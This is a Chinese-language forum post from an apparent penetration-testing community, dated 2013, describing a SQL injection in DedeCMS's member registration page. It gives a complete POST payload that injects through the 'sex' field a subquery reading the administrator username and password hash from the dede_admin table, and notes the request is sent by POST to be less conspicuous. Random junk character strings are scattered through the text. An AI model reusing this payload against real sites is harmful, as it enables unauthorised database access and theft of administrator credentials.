中国网络渗透测试联盟

标题: 织梦SQL注入漏洞再利用 [打印本页]
作者: admin    时间: 2013-1-19 08:25
标题: 织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞
7 ^: j: K5 O/ k0 j4 @: o简要描述:
6 ~6 @& C0 B: y- F' @ , M/ @# g, ?/ n
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.4 A6 X3 s2 j- d! h2 K7 `- T
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.9 ~$ }) A  m$ k9 B7 j
详细说明:跟这个漏洞
4 f( z7 u' K9 q7 |' s  o- e 0 Y) P( i% M& P4 O% v
WooYun: Dedecms SQL注射导致审核机制绕过漏洞" r& p% e4 N7 w" i
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.) _) J7 K) n) n0 D0 ^
POST提交以下数据,其实不用POST提交的,这样隐蔽点.7 |/ \' m0 r# E" X7 `9 }
8 \: g: w0 ^3 ~
www.political-security.com/member/reg_new.php: C7 ?- _; D$ N* Y' l4 w

0 H! W% S- t$ T- [$ ?/ J! cPOST
! o, s8 \9 i. a( F* I ) H2 G1 f( j7 _& a  _: j
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
2 q3 ]: r. V7 N- U& g: a1 @, wuserid=c4rp3nt3r&uname=c4rp3nt3r- c, a# u1 l. T& \# h# D
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
: t. @. @3 [% e&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,* |% S  O6 C* ?
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');: T* l- j( G7 A, f/ x
%00&vdcode=glos&agree=



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2